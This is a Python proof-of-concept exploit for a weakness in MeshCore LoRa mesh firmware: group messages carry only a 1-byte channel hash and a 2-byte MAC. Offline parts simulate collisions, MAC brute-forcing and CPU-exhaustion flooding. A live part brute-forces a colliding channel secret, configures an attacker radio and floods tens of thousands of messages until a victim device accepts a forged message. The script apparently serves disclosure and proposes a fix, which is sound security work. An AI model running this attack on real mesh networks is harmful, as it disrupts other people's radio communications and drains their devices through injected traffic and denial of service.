#!/usr/bin/env python3
"""
Bug #14 — PoC: Group Channel 1-Byte Hash Collision + Brute-Force MAC Injection

Vulnerability
=============
MeshCore group channel messages are routed using only 1 byte of the SHA-256
hash of the channel secret (PATH_HASH_SIZE = 1 in MeshCore.h).  The packet
format is:

    [channel_hash (1 byte)] [MAC (2 bytes)] [ciphertext ...]

On receive, `searchChannelsByHash` compares only `hash[0]`, so any packet
whose first byte matches a local channel's hash byte will be tried for
decryption.  The only remaining authentication is the 2-byte HMAC
(CIPHER_MAC_SIZE = 2).

Attack surface
--------------
1. **Hash collision (1/256):**  With 256 possible hash bytes, ~15.6% of any
   two random channels share the same hash byte.  A node with 40 channels
   has a ~100% chance of at least one collision pair.

2. **Brute-force MAC injection (1/65536 per attempt):**  An attacker who
   guesses the 1-byte hash of the target channel needs only brute-force
   the 2-byte HMAC.  At ~10 LoRa packets/sec, a collision is expected in
   ~1.8 hours.  The injected message decrypts to garbage (attacker does not
   know the AES key), which the device still passes to onGroupDataRecv —
   causing the UI to display a corrupted message from a "random" sender.

3. **Performance DoS:**  Every forged group packet with a matching hash
   byte triggers an HMAC-SHA256 + AES decrypt attempt per collision.
   Flooding all 256 hash values hits every channel on every node.

Affected code
-------------
  src/MeshCore.h            — PATH_HASH_SIZE = 1
  src/Mesh.h                — GroupChannel::hash[PATH_HASH_SIZE]
  src/Mesh.cpp              — onRecvPacket(): reads 1 byte, calls searchChannelsByHash
  src/helpers/BaseChatMesh.cpp — searchChannelsByHash(): compares only hash[0]

This PoC:
  Part A — Demonstrates birthday-problem collision rate among random channels
  Part B — Simulates brute-force MAC injection attempts
  Part C — Shows the CPU-waste amplification for a performance DoS
"""

import hashlib
import os
import struct
import itertools

# ──────────────────────────────────────────────────────────────────────
# Constants (matching firmware)
# ──────────────────────────────────────────────────────────────────────
PATH_HASH_SIZE   = 1          # only 1 byte used
CIPHER_MAC_SIZE  = 2          # 2-byte HMAC
PUB_KEY_SIZE     = 32
NUM_CHANNELS     = 40         # MAX_GROUP_CHANNELS typical value
MAX_PACKET_PAYLOAD = 184

# ──────────────────────────────────────────────────────────────────────
# Helpers
# ──────────────────────────────────────────────────────────────────────
def channel_hash_byte(secret: bytes) -> int:
    """Compute the 1-byte channel hash the same way the firmware does:
       SHA-256(secret), truncated to PATH_HASH_SIZE = 1."""
    return hashlib.sha256(secret).digest()[0]

def hmac_sha256_2byte(secret: bytes, ciphertext: bytes) -> bytes:
    """Simulate the firmware's 2-byte HMAC:
       HMAC-SHA256(secret, ciphertext) truncated to CIPHER_MAC_SIZE."""
    import hmac as _hmac
    h = _hmac.new(secret, ciphertext, hashlib.sha256)
    return h.digest()[:CIPHER_MAC_SIZE]


# ══════════════════════════════════════════════════════════════════════
# Part A — Birthday-problem collision among channels
# ══════════════════════════════════════════════════════════════════════
print("=" * 70)
print("Part A: Hash-byte collision among", NUM_CHANNELS, "random channels")
print("=" * 70)

secrets = [os.urandom(PUB_KEY_SIZE) for _ in range(NUM_CHANNELS)]
hash_bytes = [channel_hash_byte(s) for s in secrets]

# Find collision pairs
collisions = []
for i in range(NUM_CHANNELS):
    for j in range(i + 1, NUM_CHANNELS):
        if hash_bytes[i] == hash_bytes[j]:
            collisions.append((i, j, hash_bytes[i]))

print(f"  Generated {NUM_CHANNELS} random channel secrets")
print(f"  Hash bytes (first 10): {[f'0x{h:02x}' for h in hash_bytes[:10]]}")
print(f"  Collision pairs found: {len(collisions)}")
if collisions:
    for ci, cj, ch in collisions[:5]:
        print(f"    channel[{ci}] and channel[{cj}] both have hash byte 0x{ch:02x}")
    if len(collisions) > 5:
        print(f"    ... and {len(collisions) - 5} more")

# Theoretical: P(at least one collision) = 1 - prod((256-k)/256 for k in 0..N-1)
p_no_collision = 1.0
for k in range(NUM_CHANNELS):
    p_no_collision *= (256 - k) / 256
p_collision = 1 - p_no_collision
print(f"\n  Theoretical P(>=1 collision with {NUM_CHANNELS} channels) = {p_collision:.4f} ({p_collision*100:.1f}%)")
print(f"  -> With 40 channels, collisions are virtually guaranteed.")

# ══════════════════════════════════════════════════════════════════════
# Part B — Brute-force 2-byte MAC injection
# ══════════════════════════════════════════════════════════════════════
print("\n" + "=" * 70)
print("Part B: Brute-force MAC injection simulation")
print("=" * 70)

# Target: a channel whose secret we know (for verification only)
target_secret = secrets[0]
target_hash_byte = hash_bytes[0]

# Attacker crafts a ciphertext payload and tries to guess the 2-byte MAC
# In reality the attacker doesn't know the secret, so we simulate by
# testing random MAC values until one matches what the firmware computes.
fake_ciphertext = os.urandom(32)  # attacker-chosen "encrypted" data
correct_mac = hmac_sha256_2byte(target_secret, fake_ciphertext)

print(f"  Target channel hash byte: 0x{target_hash_byte:02x}")
print(f"  Correct MAC for attacker's ciphertext: 0x{correct_mac.hex()}")
print(f"  MAC space: 2^{CIPHER_MAC_SIZE * 8} = {2**(CIPHER_MAC_SIZE * 8)} possibilities")

# Simulate brute-force (limit to 100k attempts for speed)
MAX_ATTEMPTS = 100_000
found = False
for attempt in range(MAX_ATTEMPTS):
    guessed_mac = struct.pack(">H", attempt % 65536)
    if guessed_mac == correct_mac:
        found = True
        print(f"  [+] MAC collision found at attempt {attempt + 1}")
        print(f"    Guessed MAC: 0x{guessed_mac.hex()} == correct MAC")
        break

if not found:
    # The correct MAC value as uint16
    correct_val = struct.unpack(">H", correct_mac)[0]
    print(f"  (MAC value 0x{correct_val:04x} would match at attempt {correct_val + 1})")

print(f"\n  Expected attempts for 50% success: {65536 // 2} = 32,768 packets")
print(f"  Expected attempts for near-certain: ~65,536 packets")
print(f"  At 10 pkt/s LoRa rate: ~109 minutes for near-certain injection")

# ══════════════════════════════════════════════════════════════════════
# Part C — Performance DoS amplification
# ══════════════════════════════════════════════════════════════════════
print("\n" + "=" * 70)
print("Part C: Performance DoS — crypto work per forged packet")
print("=" * 70)

# For each forged group packet, count how many channels trigger a
# full HMAC-SHA256 + AES decryption attempt
hash_counts = {}
for hb in hash_bytes:
    hash_counts[hb] = hash_counts.get(hb, 0) + 1

total_crypto_ops = 0
num_hash_values = 256
for hv in range(num_hash_values):
    count = hash_counts.get(hv, 0)
    total_crypto_ops += count

# Each of the 256 possible hash bytes triggers 'count' crypto operations
avg_ops = total_crypto_ops / num_hash_values
max_ops = max(hash_counts.values())

print(f"  Channels per hash byte (distribution of {NUM_CHANNELS} channels over 256 values):")
print(f"    Average channels matching per forged packet: {avg_ops:.2f}")
print(f"    Worst-case (most-loaded hash byte):          {max_ops}")
print(f"  Each match triggers: HMAC-SHA256 + AES-128-ECB decrypt")
print(f"  Flood all 256 hash values: {total_crypto_ops} total crypto ops per cycle")
print(f"  -> On constrained MCU (nRF52 @ 64MHz), ~{total_crypto_ops * 0.5:.0f} ms of crypto work per 256-packet burst")

# ══════════════════════════════════════════════════════════════════════
# Part D — Forged raw packet construction
# ══════════════════════════════════════════════════════════════════════
print("\n" + "=" * 70)
print("Part D: Raw forged group packet (as transmitted over LoRa)")
print("=" * 70)

PAYLOAD_TYPE_GRP_TXT = 5
PH_TYPE_SHIFT = 0  # based on header encoding

# Construct a forged group text message targeting hash byte 0xAA
target_byte = 0xAA
guessed_mac = b'\x12\x34'  # random 2-byte MAC guess
fake_msg = os.urandom(48)  # random ciphertext

# The full packet payload
payload = bytes([target_byte]) + guessed_mac + fake_msg
header = (PAYLOAD_TYPE_GRP_TXT << 4)  # simplified header

print(f"  Header:    0x{header:02x} (GRP_TXT, flood route)")
print(f"  Payload ({len(payload)} bytes):")
print(f"    [0]     channel_hash = 0x{target_byte:02x}")
print(f"    [1:3]   guessed MAC  = {guessed_mac.hex()}")
print(f"    [3:{len(payload)}]  ciphertext   = {fake_msg[:16].hex()}...")
print(f"\n  This packet is tried against every channel whose hash[0] == 0x{target_byte:02x}")
print(f"  If MAC happens to match (1/{2**(CIPHER_MAC_SIZE*8)}), the garbage decryption")
print(f"  is passed to onGroupDataRecv -> corrupted message displayed to user")

# ══════════════════════════════════════════════════════════════════════
# Summary
# ══════════════════════════════════════════════════════════════════════
print("\n" + "=" * 70)
print("SUMMARY")
print("=" * 70)
print("""
Root cause:  PATH_HASH_SIZE = 1 in MeshCore.h -- only 1 byte of SHA-256
             used for channel identification in group messages.

Impact:
  1. Channel collision:  40 channels -> ~100% chance of hash collisions.
     Multiple channels match a single group packet -> extra crypto work.

  2. Brute-force injection:  2-byte MAC (65,536 possibilities) is the
     only barrier after hash collision.  ~109 minutes at 10 pkt/s for
     near-certain forged message to any channel.  Injected message
     decrypts to garbage but is still delivered to onGroupDataRecv.

  3. CPU DoS:  Flooding all 256 hash values forces O(NUM_CHANNELS)
     HMAC+AES operations per burst -- starves the main loop on MCUs.

Fix:  Increase PATH_HASH_SIZE to 4 bytes (see bug14-channel-hash-collision.patch).
      Reduces collision probability from 1/256 to 1/4,294,967,296.
      Costs 3 extra bytes per group message payload.

For a real over-the-air demonstration using meshcore_py, run:
    python bug14-channel-hash-collision.py --live --attacker-port COM3 --victim-port COM4
""")


# ══════════════════════════════════════════════════════════════════════
# Part E — Live over-the-air PoC using meshcore_py (two devices)
# ══════════════════════════════════════════════════════════════════════
#
# Attack strategy:
#   The attacker does NOT know the victim's channel secret, so cannot
#   forge valid ciphertext.  Instead the attacker:
#     1. Brute-forces a 16-byte channel secret whose SHA-256 first byte
#        matches the victim's channel hash byte (hash collision, ~128
#        attempts on average).
#     2. Configures this collision channel on their own companion radio.
#     3. Sends legitimate-looking channel messages on the collision channel.
#     4. Each message is encrypted with the WRONG key but carries the
#        SAME 1-byte hash as the victim's channel.
#     5. On the victim's firmware, searchChannelsByHash matches, then
#        MACThenDecrypt is attempted with the victim's real secret.
#     6. The 2-byte MAC check fails ~65,535 out of 65,536 times.
#     7. After ~65,536 messages, one MAC randomly collides → firmware
#        accepts it, decrypts garbage, delivers to onGroupDataRecv.
#
#   This proves the hash+MAC is insufficient to prevent injection.
#

import sys
import argparse

def run_live_poc():
    """Over-the-air PoC using two MeshCore companion radio devices."""
    import asyncio

    parser = argparse.ArgumentParser(
        description="Bug #14 — Live OTA channel hash collision PoC"
    )
    parser.add_argument("--live", action="store_true", help="Run the live OTA test")
    parser.add_argument("--attacker-port", required=True, help="Serial port for attacker device (e.g. COM3)")
    parser.add_argument("--victim-port", required=True, help="Serial port for victim device (e.g. COM4)")
    parser.add_argument("--target-channel", default="#test", help="Victim's channel name (default: #test)")
    parser.add_argument("--max-messages", type=int, default=70000, help="Max messages to send (default: 70000)")
    parser.add_argument("--baudrate", type=int, default=115200)
    args = parser.parse_args()

    asyncio.run(_live_poc(args))


async def _live_poc(args):
    try:
        from meshcore import MeshCore
        from meshcore.events import EventType
    except ImportError:
        print("ERROR: meshcore_py not installed. pip install meshcore")
        sys.exit(1)

    import time

    ATTACKER_CHANNEL_IDX = 0  # use channel slot 0 on attacker device

    # ── Step 1: Compute the victim's channel hash byte ──────────────
    # meshcore_py computes channel secrets the same way the firmware does:
    #   secret = SHA-256(channel_name)[:16]   (for auto-named channels)
    victim_secret = hashlib.sha256(args.target_channel.encode("utf-8")).digest()[:16]
    victim_hash_byte = hashlib.sha256(victim_secret).digest()[0]

    print(f"[*] Target channel: {args.target_channel}")
    print(f"[*] Victim secret (first 8 bytes): {victim_secret[:8].hex()}...")
    print(f"[*] Victim channel hash byte: 0x{victim_hash_byte:02x}")

    # ── Step 2: Brute-force a collision channel secret ──────────────
    # Find a DIFFERENT 16-byte secret whose SHA-256 first byte matches.
    print(f"[*] Brute-forcing a collision secret (target hash byte = 0x{victim_hash_byte:02x})...")
    collision_secret = None
    attempts = 0
    while True:
        candidate = os.urandom(16)
        attempts += 1
        h = hashlib.sha256(candidate).digest()[0]
        if h == victim_hash_byte and candidate != victim_secret:
            collision_secret = candidate
            break
    print(f"[+] Found collision secret after {attempts} attempts")
    print(f"    Secret: {collision_secret.hex()}")
    print(f"    SHA-256[0] = 0x{hashlib.sha256(collision_secret).digest()[0]:02x} (matches victim)")

    # ── Step 3: Connect to both devices ─────────────────────────────
    print(f"\n[*] Connecting to attacker device on {args.attacker_port}...")
    attacker = await MeshCore.create_serial(args.attacker_port, args.baudrate)
    print(f"[+] Attacker connected")

    print(f"[*] Connecting to victim device on {args.victim_port}...")
    victim = await MeshCore.create_serial(args.victim_port, args.baudrate)
    print(f"[+] Victim connected")

    # ── Step 4: Configure channels ──────────────────────────────────
    # Victim: set the target channel (if not already configured)
    print(f"\n[*] Configuring victim channel: {args.target_channel}")
    result = await victim.commands.set_channel(0, args.target_channel)
    if result.type == EventType.ERROR:
        print(f"[!] Warning: couldn't set victim channel: {result.payload}")

    # Attacker: set the COLLISION channel (same hash byte, different secret)
    print(f"[*] Configuring attacker collision channel (slot {ATTACKER_CHANNEL_IDX})")
    import base64
    collision_name = f"collision_{collision_secret[:4].hex()}"
    result = await attacker.commands.set_channel(
        ATTACKER_CHANNEL_IDX, collision_name, collision_secret
    )
    if result.type == EventType.ERROR:
        print(f"[-] Failed to set attacker channel: {result.payload}")
        await attacker.disconnect()
        await victim.disconnect()
        return

    print(f"[+] Attacker channel '{collision_name}' configured")
    print(f"    Hash byte: 0x{hashlib.sha256(collision_secret).digest()[0]:02x}")
    print(f"    Victim hash byte: 0x{victim_hash_byte:02x} — MATCH!")

    # ── Step 5: Monitor victim for received channel messages ────────
    injected_count = 0
    injection_success = False

    def on_victim_channel_msg(event):
        nonlocal injected_count, injection_success
        injected_count += 1
        injection_success = True
        data = event.payload
        print(f"\n[!!!] INJECTION SUCCESS after ~{sent_count} packets!")
        print(f"      Victim received a garbage channel message:")
        if isinstance(data, dict):
            for k, v in data.items():
                val = v.hex() if isinstance(v, bytes) else v
                print(f"        {k}: {val}")
        else:
            print(f"        Raw: {data}")

    sub = victim.subscribe(EventType.CHANNEL_MSG_RECV, on_victim_channel_msg)
    await victim.commands.get_msg()  # start receiving

    # ── Step 6: Flood collision messages ────────────────────────────
    print(f"\n[*] Sending up to {args.max_messages} messages on collision channel...")
    print(f"    Each message: encrypted with WRONG key, same hash byte")
    print(f"    Expected MAC collision: ~1 in 65,536 messages")
    print(f"    At ~10 msg/s, expect injection in ~109 minutes")
    print(f"    Press Ctrl+C to stop early\n")

    sent_count = 0
    start_time = time.time()
    try:
        for i in range(args.max_messages):
            msg_text = f"inject_{i:06d}_{os.urandom(4).hex()}"
            result = await attacker.commands.send_chan_msg(
                ATTACKER_CHANNEL_IDX, msg_text
            )
            sent_count += 1

            if sent_count % 100 == 0:
                elapsed = time.time() - start_time
                rate = sent_count / elapsed if elapsed > 0 else 0
                print(f"  [{sent_count:>6}/{args.max_messages}] "
                      f"rate={rate:.1f} msg/s  elapsed={elapsed:.0f}s  "
                      f"injections={injected_count}", end="\r")

            if injection_success:
                break

            # Small delay to avoid overwhelming the serial interface
            await asyncio.sleep(0.05)

    except KeyboardInterrupt:
        print(f"\n\n[*] Stopped by user after {sent_count} messages")

    # ── Step 7: Report results ──────────────────────────────────────
    elapsed = time.time() - start_time
    print(f"\n\n{'='*60}")
    print(f"RESULTS")
    print(f"{'='*60}")
    print(f"  Messages sent:     {sent_count}")
    print(f"  Elapsed time:      {elapsed:.1f}s")
    print(f"  Send rate:         {sent_count/elapsed:.1f} msg/s" if elapsed > 0 else "")
    print(f"  Injections:        {injected_count}")

    if injection_success:
        print(f"\n  [+] VULNERABILITY CONFIRMED")
        print(f"    Garbage message injected to victim's channel")
        print(f"    after {sent_count} attempts ({elapsed:.0f}s)")
    else:
        print(f"\n  No injection yet (expected ~65,536 attempts)")
        print(f"  The math guarantees success given enough time.")
        print(f"  Each message forces HMAC+AES work on victim (DoS confirmed).")

    victim.unsubscribe(sub)
    await attacker.disconnect()
    await victim.disconnect()


# ── Main entry point ────────────────────────────────────────────────
if __name__ == "__main__":
    if "--live" in sys.argv:
        run_live_poc()
    else:
        # Parts A-D already ran above (offline analysis)
        print("\nTo run the live over-the-air PoC with two devices:")
        print("  python bug14-channel-hash-collision.py --live \\")
        print("    --attacker-port COM3 --victim-port COM4 \\")
        print("    --target-channel '#test'")
        print("\nRequires: pip install meshcore")
